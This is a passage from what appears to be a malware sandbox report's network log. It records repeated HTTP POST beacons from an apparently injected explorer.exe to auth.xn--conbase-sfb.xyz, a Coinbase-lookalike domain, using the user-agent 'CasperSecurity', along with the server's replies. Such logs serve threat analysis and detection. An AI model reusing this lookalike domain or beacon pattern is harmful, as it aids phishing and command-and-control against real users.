                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C11r874ekpYe5EV5bdOvT0xJMl4Jg%2F8QeME6HqWVDF1Qb1cBTyroPP8wZYj6o66IoMQlJPqWjYypxgtWQhKzDCie5wDa4QsU0Enkg5UqeRjeRCWZjO%2FqWc4FkbkNU%2FcNYJthM66MolQUHV8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f736e3a80d6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                37192.168.2.449800188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.711307049 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.717628956 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.441332102 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:51 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuKZ0Cwe%2BAPTmOUg5CEfI7VGe4RdZkxo%2FQUUjjO91yDW1b6IuKBUMhQ9MFZV17ualeuGfd2dkjfWAALMvfVDZkrQvS3ERwoKd%2BLDYBPS2H8Hlob6x6PuWJ1Vb2jxIY77zjLLUrZdxTIuQio%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f788ee243a5-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                38192.168.2.449802188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.556829929 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.561723948 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.313571930 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:52 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrQ8nOqU8grV6dgcc4dsb%2BGP2laCGy5hut2SMbIIRDsXZx2b%2BRyPMfzEaK5eH2WEgJvokb9CWaULETpXNRy8Bwg5BY8xNzfmBvTrULJqOGh%2FOQ7lB%2BhSrKJqpQYklME0%2BjPYta0ryD3OQ%2B4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f7ddc710c80-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                39192.168.2.449803188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.431545019 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.437067986 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.168668985 CEST625INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:53 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vy3%2BY7yaTol2SbE9ziRo%2FrJb%2FSYllCIQq38LF6GvB%2BD0IV%2BM6xoRZmJ8bW67bCt3Jt%2F7fEFo9I8j8Vqiwp8RI4nSE56CSx6KsI7JiWyEg%2FlrCBPIpm5nbW59iGJpECBWKaaeLatqrQsP99o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f833b244213-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                40192.168.2.449804188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.289576054 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.295018911 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.020123959 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:53 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HLF0BKT0aHWD0SVy0JFuuh8YVN3PWQgQlGtJRNInMLhGAxZKkzRMsNBKF4D%2BgBw6L1gyjgO8p%2FOLhIL2aZkB5DZHdBuWPZyHLtdyASS37L4oLy%2B19jzJt4xFLdt4oKn6iNYs1Wp880%2BiZUY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f88ad977ca6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                41192.168.2.449805188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.303209066 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.308731079 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.139020920 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:55 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ClaKp0FAZHa8ixJxmEEjfTI7mnW9iYLvmnGxhep25cwBW0xWhTR9cXX3C9Hmb%2FrRowkdL5%2Bo0u16bpx3OiFv8U%2BrhUkVZ8qzn1sgG%2BOugZ%2BfxraLzEmMsvJJmUhnrOckHvj4BIvbWsfm2Yk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f8f0bf70f4b-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                42192.168.2.449806188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.258519888 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.263797998 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.015944004 CEST613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:55 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysgOjSRASCrgjcuX3OWU4ZxoqUgGLa%2FA79DT1nuLYWSaKkQ0AZhhaWygjcaPUAPZQa6HHNNnYFGOPZwkbFSJEpsF2jK6QIr66F8BptMY7K2vsAzmhtYKwizajqRr9vjKymlnq8kApInUIQI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f94ec780f9f-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                43192.168.2.449807188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.133136988 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.138015985 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.853563070 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:56 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=anlTDWCavDrRM8x24Ek3xrKbVlCJeh3JB47m%2BnssBfMH6b5c%2BalAOoh8NJt8SXBt%2FqiUUqiBZyjz4M0sMQsBuC3Yubwb7tkVL4JtrFj1BzuejywXy9mhW9bVWaCPGDxZWOrWNV9xT6sJH0Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f9a6fd44276-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                44192.168.2.449808188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.977998018 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.983895063 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.796525002 CEST625INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:57 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NVVqCmMwiMivDcVPK5rJDuw4gxfckz4BTZNXmA7nVdibzYDJeYDWGh8OlnG1cRDD7yj3qLC6x%2BovvkacPtzX6ZUc4NTFbg54RtX%2B%2BtYmSXHC8sE2wjfg9qm7fI4jED2%2BMX%2B%2FVWYP%2BMAhW2U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f9fbf707d13-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                45192.168.2.449810188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.914474010 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.919308901 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.632778883 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:58 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lLBzLPgDddsVBGdHgY%2F0ymEI6FvfsNf%2FXrKEPZV2F6mREAyjXv9uef9VqnR22WZQMjXlxKNAYoCZ1KySkVsZX2Mmo2i3c7a6BWL8jXsK3itwsUI6cJpSYSCUUKVxQJFrpVHpQXpzEmLmDSk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fa58ee043a9-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                46192.168.2.449812188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.758425951 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.764070988 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.492866993 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:59 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rsFvplpJAQO0A%2F57fHYomS6tus%2F4l2ZvuWYbmez7ewhzBYpcBX7mWYgjP4jZSePtLs3KBUXYM3pddWQIZEfkXmBFIAc6WM2Qv8MWXdIhplIj59CubKUMcfwlPNpN46FWsbGLjOnfb%2FQwS3c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3faabc2042ac-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                47192.168.2.449814188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.602953911 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.607975006 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.432348013 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:01 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoILp7ysl1FED%2BkDJEW6YjksbZSPmBy6Bb7dhoEgZMk2pTJDb76zY5acRF4fM4%2FDNTvl%2Fa0TgaNVjSK%2FOHjKzipTC0rtJuxBUXXPV1tuX9V0%2FaL3XzTTIqDW9tuuTXRBXFhwlkXaNIb8V%2Bk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fb018e143a5-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                48192.168.2.449815188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.558139086 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.565984011 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.274036884 CEST627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:02 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5a%2BXHll9r4Y6wkpd%2FXwtdwPXmIlkFlhA8%2BXAon0GQdlhgcoAtXUYSbrZb%2Bt9yzwmZ2il%2BoKSu%2BwaIuB0gq4Drv%2FmdUVvsL5J%2BepDeXr0x3lxoSjd79RDC5Q22ro6EPtJrH4wyFQGYTC3DEs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fbc4f568c45-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                49192.168.2.449816188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.399445057 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.404653072 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.112416029 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:03 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFZ3kV6Tg6GXDRv2yLPX0UvNzFS4Oq0Lra76EicC4w6gQbPRrI38dosjfmyDMS7QKT6gFxkZ03VpBY%2Fui9sUfBhguI7gFpseQHfBt0cus%2BWKdfN9Bl3mzxRDAQMmnXotHiIaPRxiuGtC%2FrA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fc1884d43ff-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                50192.168.2.449817188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.274019957 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
